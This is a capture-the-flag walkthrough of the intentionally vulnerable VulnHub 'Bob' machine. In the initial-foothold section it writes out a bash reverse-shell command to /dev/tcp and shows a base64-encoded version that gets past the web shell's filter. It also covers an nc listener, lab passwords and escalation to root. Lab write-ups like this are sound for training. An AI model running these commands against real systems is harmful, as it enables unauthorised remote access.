VulnHub: Bob Walkthrough

Bob is another intentionally vulnerable machine on VulnHub created by c0rruptedb1t

Enumeration

Starting enumeration with AutoRecon.

Nmap scan report for 192.168.50.153
Host is up, received arp-response (0.0089s latency).
Scanned at 2022-01-02 19:33:41 EST for 8s
Not shown: 998 closed ports
Reason: 998 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 ProFTPD 1.3.5b
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))

Only two ports are open. FTP doesn't have anonymous login, so let's get started with port 80.

It is a website for high school. We start looking at all the pages and their source code.

On /news.html, found a commented line with a string which looks interesting.

Used hashes.com to identify the encoding of the string. It is base64.

┌──(root💀kali)-[~]
└─# echo "SW4gb3RoZXIgbmV3cyBzb21lIGR1bWJhc3MgbWFkZSBhIGZpbGUgY2FsbGVkIHBhc3N3b3Jkcy5odG1sLCBjb21wbGV0ZWx5IGJyYWluZGVhZA0KDQotQm9i" | base64 -d

In other news some dumbass made a file called passwords.html, completely braindead

-Bob

We got the first hint. There is /passwords.html file.

So, dirbusting should lead to us to other files in the web root folder.

Before we do that, lets have a look at other pages in the navigation bar too.

Logging through /login.html has been ceased but source code has a hint.

Apparently, we are looking for a web shell too.

/robots.txt disallows four entries.

User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html

/login.php was not found on the server.

/passwords.html is the one we found earlier.

/dev_shell.php consists of a web shell.

/lat_memo.html is a memo from Bob saying the filters in the web shell have been imported from the old Windows server to the now running linux server.

Dirbusting brought about the same results.

Initial Foothold

The web shell we have is heavily filtered. We can try and get a reverse shell from it.

It doesn't parse commands like below to get a reverse TCP shell, it doesn't work because various characters have been filtered.

bash -i >& /dev/tcp/192.168.50.129/443 0>&1

So, we use another trick where the above command is converted to base64 and then decoded in the web shell itself.

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS80NDMgMD4mMQ== | base64 -d | bash

This will essentially send the base64 string, decode it and then pass it to bash which will execute the command.

We setup a listener on port 443 and we shall receive a shell back.

┌──(root💀kali)-[~]
└─# nc -nlvp 443                
listening on [any] 443 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.153] 52904
bash: cannot set terminal process group (610): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Milburg-High:/var/www/html$ whoami
whoami
www-data

We get low privileged shell as www-data.

Privilege Escalation

Enumerating the box once again:

Home dir of all the users is accessible.

www-data@Milburg-High:/home$ ls
ls
bob
elliot
jc
seb

In Bob's home dir, we find an Old Password file with passwords of two users:

www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

In addition to that, we find a .gpg file, we'll take note of that and move on.

www-data@Milburg-High:/home/bob/Documents$ ls -la
ls -la
total 20
drwxr-xr-x  3 bob bob 4096 Mar  5  2018 Secret
-rw-r--r--  1 bob bob   91 Mar  5  2018 login.txt.gpg
-rw-r--r--  1 bob bob  300 Mar  4  2018 staff.txt

Nested deep into the Secret dir, we also find a shell script which could come in handy later.

<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"

jc's home dir is empty.

elliot's home dir has a file which confirms jc's password and Qwerty and that elliot's password is theadminisdumb.

At this moment, we have password of all the users and could ssh into them.

Remember, how we came across a .gpg file, googled a bit and it is an encrypted password file in bob's dir who also happens to be the admin.

First letter in every line of the bash script (notes.sh) make up HARPOCRATES which we can try as the pass phrase for the gpg file we have to decrypt.

www-data@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: keybox '/home/jc/.gnupg/pubring.kbx' created
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_

We get the password of bob which is b0bcat_.

Change the user to bob.

www-data@Milburg-High:/home/bob/Documents$ su bob
Password: 
bob@Milburg-High:/home/bob/Documents$ whoami
bob
bob@Milburg-High:/home/bob/Documents$ sudo -i
root@Milburg-High:~#

We have a shell as bob who is also an admin.

And then we use sudo -i to get root.

root@Milburg-High:~# cat flag.txt
hey n there flag.txt

And there's our root flag.